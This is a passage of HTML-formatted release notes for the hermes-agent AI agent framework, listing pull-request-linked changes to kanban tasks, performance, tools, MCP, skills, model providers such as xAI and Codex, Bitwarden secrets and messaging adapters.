<li>Reset failure counters on <code>unblock_task</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/28379" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28379/hovercard">#28379</a>)</li>
<li>Detect cycles in <code>decompose_triage_task</code> sibling-link pre-validation. (<a href="https://github.com/NousResearch/hermes-agent/pull/28088" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28088/hovercard">#28088</a>)</li>
<li>Surface unusable triage auxiliary model (auto-decompose aware). (<a href="https://github.com/NousResearch/hermes-agent/pull/27871" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27871/hovercard">#27871</a>)</li>
<li>Align failure diagnostics with retry limit. (<a href="https://github.com/NousResearch/hermes-agent/pull/27868" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27868/hovercard">#27868</a>)</li>
<li>Align worker terminal timeout with task runtime. (<a href="https://github.com/NousResearch/hermes-agent/pull/27864" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27864/hovercard">#27864</a>)</li>
<li>Auto-install bundled skills (kanban-worker) on init. (<a href="https://github.com/NousResearch/hermes-agent/pull/28368" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28368/hovercard">#28368</a>)</li>
<li>Make legacy task migration idempotent. (<a href="https://github.com/NousResearch/hermes-agent/pull/28397" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28397/hovercard">#28397</a>)</li>
<li>Serialize DB initialization. (<a href="https://github.com/NousResearch/hermes-agent/pull/28383" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28383/hovercard">#28383</a>)</li>
<li>Persist worker session metadata on completion. (<a href="https://github.com/NousResearch/hermes-agent/pull/28387" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28387/hovercard">#28387</a>)</li>
<li>Pass <code>accept-hooks</code> to worker chat subprocess. (<a href="https://github.com/NousResearch/hermes-agent/pull/28393" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28393/hovercard">#28393</a>)</li>
<li>Preserve worker tools with restricted toolsets. (<a href="https://github.com/NousResearch/hermes-agent/pull/28396" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28396/hovercard">#28396</a>)</li>
<li>Avoid unsafe Windows worker Hermes shim resolution. (<a href="https://github.com/NousResearch/hermes-agent/pull/28398" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28398/hovercard">#28398</a>)</li>
<li>Sync slash subcommands with live parser. (<a href="https://github.com/NousResearch/hermes-agent/pull/28376" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28376/hovercard">#28376</a>)</li>
<li>Show scheduled kanban tasks in dashboard. (<a href="https://github.com/NousResearch/hermes-agent/pull/28400" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28400/hovercard">#28400</a>)</li>
<li>Assign single-task kanban decompositions. (<a href="https://github.com/NousResearch/hermes-agent/pull/28401" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28401/hovercard">#28401</a>)</li>
<li>Configurable <code>max_tokens</code> for kanban specify. (<a href="https://github.com/NousResearch/hermes-agent/pull/28374" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28374/hovercard">#28374</a>)</li>
<li>Per-job profile support for cron. (<a href="https://github.com/NousResearch/hermes-agent/pull/28124" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28124/hovercard">#28124</a>)</li>
<li>Codex app-server: include every Kanban-pinned path in <code>writable_roots</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/28435" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28435/hovercard">#28435</a>)</li>
<li>Cache kanban worker guidance at session init for prompt-cache reuse. (<a href="https://github.com/NousResearch/hermes-agent/pull/28425" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28425/hovercard">#28425</a>)</li>
</ul>
<hr>
<h2>⚡ Performance</h2>
<ul>
<li><code>openai._base_client</code> import deferred — 240ms / 17MB off every CLI cold start. (<a href="https://github.com/NousResearch/hermes-agent/pull/28864" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28864/hovercard">#28864</a>)</li>
<li>Agent-loop hot-path optimizations — 47% fewer per-conversation function calls (399k → 213k for 31-turn chat). (<a href="https://github.com/NousResearch/hermes-agent/pull/28866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28866/hovercard">#28866</a>)</li>
<li>Compression-feasibility check deferred — 170-290ms off every agent construction. (<a href="https://github.com/NousResearch/hermes-agent/pull/28957" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28957/hovercard">#28957</a>)</li>
<li>Adaptive subprocess poll — ~195ms off every tool call, 1+ second per turn. (<a href="https://github.com/NousResearch/hermes-agent/pull/29006" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29006/hovercard">#29006</a>)</li>
<li>Termux TUI cold start speedup. (<a href="https://github.com/NousResearch/hermes-agent/pull/29419" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29419/hovercard">#29419</a>)</li>
<li>Termux non-TUI cold start speedup. (salvage <a href="https://github.com/NousResearch/hermes-agent/pull/29438" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29438/hovercard">#29438</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30121" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30121/hovercard">#30121</a>)</li>
<li>Termux fast-path version + deferred bare-prompt agent startup. (<a href="https://github.com/NousResearch/hermes-agent/pull/30609" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30609/hovercard">#30609</a>)</li>
<li>Cut hermes <code>--version</code> wall time 63% — flips head-to-head vs Codex CLI. (<a href="https://github.com/NousResearch/hermes-agent/pull/31968" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31968/hovercard">#31968</a>)</li>
<li>Date-only timestamp + loud gateway-DB roundtrip logging — improves prompt-cache hit rate. (<a href="https://github.com/NousResearch/hermes-agent/pull/27675" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27675/hovercard">#27675</a>)</li>
<li>Cache kanban worker guidance at session init for prompt-cache reuse. (<a href="https://github.com/NousResearch/hermes-agent/pull/28425" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28425/hovercard">#28425</a>)</li>
</ul>
<hr>
<h2>🔧 Tool System</h2>
<h3>Tool surface</h3>
<ul>
<li><code>patch</code>: indent preservation, CRLF preservation, per-file failure escalation. (<a href="https://github.com/NousResearch/hermes-agent/pull/32273" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32273/hovercard">#32273</a>)</li>
<li><code>terminal</code>: warn at call time when <code>background=true</code> runs silently. (<a href="https://github.com/NousResearch/hermes-agent/pull/31289" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31289/hovercard">#31289</a>)</li>
<li><code>terminal</code>: nudge homebrewed CI pollers at the tool surface. (<a href="https://github.com/NousResearch/hermes-agent/pull/33142" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33142/hovercard">#33142</a>)</li>
<li><code>x_search</code>: surface degraded results + validate dates. (<a href="https://github.com/NousResearch/hermes-agent/pull/29484" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29484/hovercard">#29484</a>)</li>
<li><code>x_search</code>: auto-enable toolset when xAI credentials are configured. (<a href="https://github.com/NousResearch/hermes-agent/pull/27376" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27376/hovercard">#27376</a>)</li>
<li><code>computer_use</code>: route SOM/vision captures via auxiliary.vision. (<a href="https://github.com/NousResearch/hermes-agent/pull/30126" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30126/hovercard">#30126</a>)</li>
<li><code>transcription</code>: reject symlinked audio inputs. (<a href="https://github.com/NousResearch/hermes-agent/pull/10082" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/10082/hovercard">#10082</a>)</li>
<li>TTS: prevent double <code>[pause]</code> in xAI auto speech tags. (<a href="https://github.com/NousResearch/hermes-agent/pull/32237" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32237/hovercard">#32237</a>)</li>
<li>TTS: preserve native audio outside Telegram voice delivery. (<a href="https://github.com/NousResearch/hermes-agent/pull/28512" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28512/hovercard">#28512</a>)</li>
<li>TTS: opt-in xAI <code>auto_speech_tags</code> speech-tag pauses for natural voice replies. (<a href="https://github.com/NousResearch/hermes-agent/pull/29376" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29376/hovercard">#29376</a>)</li>
<li>Voice: chunk oversized CLI recordings. (<a href="https://github.com/NousResearch/hermes-agent/pull/30044" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30044/hovercard">#30044</a>)</li>
<li>Voice: honor <code>PULSE_SERVER</code> / <code>PIPEWIRE_REMOTE</code> inside Docker. (<a href="https://github.com/NousResearch/hermes-agent/pull/22534" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22534/hovercard">#22534</a>)</li>
</ul>
<h3>Browser</h3>
<ul>
<li>All cloud browser providers (Browserbase, Anchor, Camofox, Hyperbrowser, etc.) migrated to image_gen-style plugins. (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/25580" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25580/hovercard">#25580</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27403" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27403/hovercard">#27403</a>)</li>
<li>Auto-launch Chromium-family browser for CDP. (<a href="https://github.com/NousResearch/hermes-agent/pull/29106" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29106/hovercard">#29106</a>)</li>
<li>Docker: discover agent-browser Chromium binary at boot. (<a href="https://github.com/NousResearch/hermes-agent/pull/33184" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33184/hovercard">#33184</a>)</li>
</ul>
<h3>Image generation</h3>
<ul>
<li><strong>Krea</strong> provider plugin (Krea 2 Medium + Large). (<a href="https://github.com/NousResearch/hermes-agent/pull/33236" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33236/hovercard">#33236</a>)</li>
<li>FAL backend ported to <code>plugins/image_gen/fal</code>. (salvage <a href="https://github.com/NousResearch/hermes-agent/pull/27966" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27966/hovercard">#27966</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30380" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30380/hovercard">#30380</a>)</li>
<li>Cache xAI ephemeral URL responses to disk. (<a href="https://github.com/NousResearch/hermes-agent/pull/31759" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31759/hovercard">#31759</a>)</li>
</ul>
<h3>Web search</h3>
<ul>
<li><strong>xAI Web Search</strong> as a provider plugin. (<a href="https://github.com/NousResearch/hermes-agent/pull/29042" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29042/hovercard">#29042</a>)</li>
</ul>
<h3>MCP</h3>
<ul>
<li><strong>Nous-approved MCP catalog</strong> with interactive picker. (<a href="https://github.com/NousResearch/hermes-agent/pull/30870" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30870/hovercard">#30870</a>)</li>
<li><strong>TLS client certificate (mTLS) support</strong> for HTTP and SSE MCP servers. (<a href="https://github.com/NousResearch/hermes-agent/pull/33721" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33721/hovercard">#33721</a>)</li>
<li>Stdin paste-back fallback for headless OAuth flow. (<a href="https://github.com/NousResearch/hermes-agent/pull/32053" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32053/hovercard">#32053</a>)</li>
<li><code>skip</code> at paste prompt bypasses auth without disabling server. (<a href="https://github.com/NousResearch/hermes-agent/pull/32069" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32069/hovercard">#32069</a>)</li>
<li>Registry-aware <code>mcp_</code> prefix on both ends of round-trip. (<a href="https://github.com/NousResearch/hermes-agent/pull/31700" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31700/hovercard">#31700</a>)</li>
</ul>
<hr>
<h2>🧩 Skills Ecosystem</h2>
<h3>Skills system</h3>
<ul>
<li><strong>Skill bundles</strong> — <code>/&lt;name&gt;</code> loads multiple skills. (<a href="https://github.com/NousResearch/hermes-agent/pull/28373" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28373/hovercard">#28373</a>)</li>
<li>Skills Hub: health checks, freshness badge, and a watchdog cron. (<a href="https://github.com/NousResearch/hermes-agent/pull/32345" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32345/hovercard">#32345</a>)</li>
<li>Opt-in AST deep diagnostics on skill writes. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/30918" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30918/hovercard">#30918</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/31198" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31198/hovercard">#31198</a>)</li>
<li>Bundled/pinned skill protection in background-review prompts. (<a href="https://github.com/NousResearch/hermes-agent/pull/28338" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28338/hovercard">#28338</a>)</li>
<li>Show user-modified skill names in bundled skill sync summary. (<a href="https://github.com/NousResearch/hermes-agent/pull/28671" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28671/hovercard">#28671</a>)</li>
<li>Load symlinked skill slash commands. (<a href="https://github.com/NousResearch/hermes-agent/pull/27759" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27759/hovercard">#27759</a>)</li>
<li>Deduplicate Skills Hub search results by identifier, not name. (<a href="https://github.com/NousResearch/hermes-agent/pull/29490" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29490/hovercard">#29490</a>)</li>
</ul>
<h3>New skills</h3>
<ul>
<li><code>openhands</code> — delegate-to-OpenHands orchestration skill (closes <a href="https://github.com/NousResearch/hermes-agent/issues/477" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/477/hovercard">#477</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/32261" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32261/hovercard">#32261</a>)</li>
<li><code>code-wiki</code> — persistent indexed dev wiki (closes <a href="https://github.com/NousResearch/hermes-agent/issues/486" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/486/hovercard">#486</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/32240" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32240/hovercard">#32240</a>)</li>
<li><code>web-pentest</code> — OWASP recipes (closes <a href="https://github.com/NousResearch/hermes-agent/issues/400" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/400/hovercard">#400</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/32265" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32265/hovercard">#32265</a>)</li>
<li><code>baoyu-article-illustrator</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/28287" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28287/hovercard">#28287</a>)</li>
</ul>
<hr>
<h2>☁️ Providers</h2>
<h3>xAI deep integration</h3>
<ul>
<li><strong>xAI Web Search</strong> as a <code>plugins/web/xai/</code> provider plugin. (<a href="https://github.com/NousResearch/hermes-agent/pull/29042" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29042/hovercard">#29042</a>)</li>
<li><strong><code>hermes proxy</code> xAI upstream</strong> — OpenAI-compatible local proxy backed by xai-oauth. (<a href="https://github.com/NousResearch/hermes-agent/pull/28356" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28356/hovercard">#28356</a>)</li>
<li><strong>May 15 model retirement detection + <code>hermes migrate xai</code></strong> for grok-4 / grok-3 / grok-code-fast-1 / grok-imagine-image-pro. (<a href="https://github.com/NousResearch/hermes-agent/pull/29277" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29277/hovercard">#29277</a>)</li>
<li><strong>Opt-in <code>auto_speech_tags</code></strong> for natural xAI TTS voice replies. (<a href="https://github.com/NousResearch/hermes-agent/pull/29376" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29376/hovercard">#29376</a>)</li>
<li><strong>xai-oauth base_url pinned to x.ai origin</strong> — closes silent credential-leak vector. (<a href="https://github.com/NousResearch/hermes-agent/pull/28952" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28952/hovercard">#28952</a>)</li>
<li><strong>OpenAI-style execution guidance</strong> applied to Grok / xai-oauth models. (<a href="https://github.com/NousResearch/hermes-agent/pull/27797" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27797/hovercard">#27797</a>)</li>
<li>xAI: detect retired May 15 models in doctor/chat startup. (<a href="https://github.com/NousResearch/hermes-agent/pull/29277" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29277/hovercard">#29277</a>)</li>
<li>xAI: resolve Grok Build context for OAuth. (<a href="https://github.com/NousResearch/hermes-agent/pull/30579" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30579/hovercard">#30579</a>)</li>
<li>xAI OAuth: tier-gated 403 with API-key fallback. (<a href="https://github.com/NousResearch/hermes-agent/pull/28351" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28351/hovercard">#28351</a>)</li>
<li>xAI OAuth: PKCE <code>code_challenge</code> echo. (<a href="https://github.com/NousResearch/hermes-agent/pull/27560" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27560/hovercard">#27560</a>)</li>
<li>xAI OAuth: quarantine dead tokens on terminal refresh failure. (<a href="https://github.com/NousResearch/hermes-agent/pull/28116" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28116/hovercard">#28116</a>)</li>
<li>xAI OAuth: honor <code>WKE=unauthenticated</code> disambiguator at both classifier sites. (<a href="https://github.com/NousResearch/hermes-agent/pull/30872" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30872/hovercard">#30872</a>)</li>
<li>xAI OAuth: accept bare-code manual paste (state=None). (closes <a href="https://github.com/NousResearch/hermes-agent/issues/26923" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/26923/hovercard">#26923</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33880" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33880/hovercard">#33880</a>)</li>
<li>xAI OAuth: fall back to manual paste on loopback timeout. (<a href="https://github.com/NousResearch/hermes-agent/pull/33231" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33231/hovercard">#33231</a>)</li>
<li>xAI proxy: handle 429 rate-limit responses in proxy retry path. (<a href="https://github.com/NousResearch/hermes-agent/pull/33743" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33743/hovercard">#33743</a>)</li>
</ul>
<h3>Other providers</h3>
<ul>
<li><strong>OpenAI API as a first-class provider</strong> (distinct from Codex runtime). (<a href="https://github.com/NousResearch/hermes-agent/pull/31898" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31898/hovercard">#31898</a>)</li>
<li><strong>Microsoft Entra ID</strong> auth for Azure Foundry (with 1M Anthropic-Messages beta preserved on Bearer). (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/27509" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27509/hovercard">#27509</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/27022" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27022/hovercard">#27022</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/28101" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28101/hovercard">#28101</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28084" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28084/hovercard">#28084</a>)</li>
<li><strong>OpenRouter</strong> sticky routing — <code>session_id</code> passed via <code>extra_body</code> so a long-running session keeps landing on the same upstream provider. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Cybourgeoisie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Cybourgeoisie">@Cybourgeoisie</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33939" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33939/hovercard">#33939</a>)</li>
<li>Nous: JWT token for inference; stop replaying invalid Nous refresh tokens. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rewbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rewbs">@rewbs</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27663" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27663/hovercard">#27663</a>)</li>
<li>Nous Portal: one-shot setup, status CLI, and Nous-included markers. (<a href="https://github.com/NousResearch/hermes-agent/pull/30860" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30860/hovercard">#30860</a>)</li>
<li>Anthropic adapter: extract 7 helpers from <code>convert_messages_to_anthropic</code>. (salvage <a href="https://github.com/NousResearch/hermes-agent/pull/27784" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27784/hovercard">#27784</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30386" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30386/hovercard">#30386</a>)</li>
<li>Catalog: add <code>qwen3.7-max</code> to Alibaba + Alibaba-Coding-Plan model lists. (<a href="https://github.com/NousResearch/hermes-agent/pull/33129" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33129/hovercard">#33129</a>)</li>
<li>opencode-go: route <code>qwen3.7-max</code> via <code>anthropic_messages</code>. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beardthelion/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beardthelion">@beardthelion</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/32780" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32780/hovercard">#32780</a>)</li>
<li>opencode-go: expose Kimi K2 + DeepSeek reasoning controls. (<a href="https://github.com/NousResearch/hermes-agent/pull/30845" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30845/hovercard">#30845</a>)</li>
<li>Remove Vercel AI Gateway and Vercel Sandbox.</li>
<li>MiniMax OAuth: refresh short-lived access tokens per request. (<a href="https://github.com/NousResearch/hermes-agent/pull/30619" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30619/hovercard">#30619</a>)</li>
<li>Codex OAuth: quarantine terminal refresh errors. (<a href="https://github.com/NousResearch/hermes-agent/pull/28118" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28118/hovercard">#28118</a>)</li>
<li>Codex: drop dead model slugs that HTTP 400 on ChatGPT Pro. (<a href="https://github.com/NousResearch/hermes-agent/pull/33424" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33424/hovercard">#33424</a>)</li>
<li>Codex: sync <code>manual:device_code</code> pool entries on re-auth. (<a href="https://github.com/NousResearch/hermes-agent/pull/33744" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33744/hovercard">#33744</a>)</li>
<li>MiniMax OAuth: quarantine terminal refresh errors. (<a href="https://github.com/NousResearch/hermes-agent/pull/28119" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28119/hovercard">#28119</a>)</li>
</ul>
<hr>
<h2>🔑 Secrets</h2>
<ul>
<li><strong>Bitwarden Secrets Manager</strong> integration with lazy <code>bws</code> install. (<a href="https://github.com/NousResearch/hermes-agent/pull/30035" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30035/hovercard">#30035</a>)</li>
<li>Bitwarden: EU Cloud + self-hosted server URL support. (<a href="https://github.com/NousResearch/hermes-agent/pull/31378" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31378/hovercard">#31378</a>)</li>
<li>Label detected credentials with their source (Bitwarden). (<a href="https://github.com/NousResearch/hermes-agent/pull/30364" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30364/hovercard">#30364</a>)</li>
</ul>
<hr>
<h2>📱 Messaging Platforms (Gateway)</h2>
<h3>Gateway core</h3>
<ul>
<li><strong>Deliverable mode</strong> — agents ship artifacts as native uploads from any platform (Slack/Discord/Telegram/Teams/Email). (<a href="https://github.com/NousResearch/hermes-agent/pull/27813" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27813/hovercard">#27813</a>)</li>
<li><code>hermes send</code> — pipe any script's output to any messaging platform. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/19631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/19631/hovercard">#19631</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27188" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27188/hovercard">#27188</a>)</li>
<li>Debounce queued text follow-ups during active sessions. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/31235" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31235/hovercard">#31235</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/31341" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31341/hovercard">#31341</a>)</li>
<li>Plugin-transformed final_response delivered through streaming gate. (<a href="https://github.com/NousResearch/hermes-agent/pull/31433" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31433/hovercard">#31433</a>)</li>
<li>Refresh cached agent tools on <code>/reload-mcp</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/32815" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32815/hovercard">#32815</a>)</li>
<li>Harden kanban + provider cleanup races on long-running workloads. (<a href="https://github.com/NousResearch/hermes-agent/pull/29479" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29479/hovercard">#29479</a>)</li>
</ul>
<h3>New / reorganized adapters</h3>
<ul>
<li><strong>ntfy</strong> — 23rd platform, push notifications, plugin shape, zero core edits. (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/30625" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30625/hovercard">#30625</a> → <a href="https://github.com/NousResearch/hermes-agent/pull/4043" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4043/hovercard">#4043</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30867" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30867/hovercard">#30867</a>)</li>
<li><strong>Discord</strong> adapter migrated to bundled plugin. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/24356" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24356/hovercard">#24356</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30591" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30591/hovercard">#30591</a>)</li>
<li><strong>Mattermost</strong> adapter migrated to bundled plugin. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/30916" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30916/hovercard">#30916</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/31748" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31748/hovercard">#31748</a>)</li>
</ul>
<h3>Telegram</h3>
<ul>
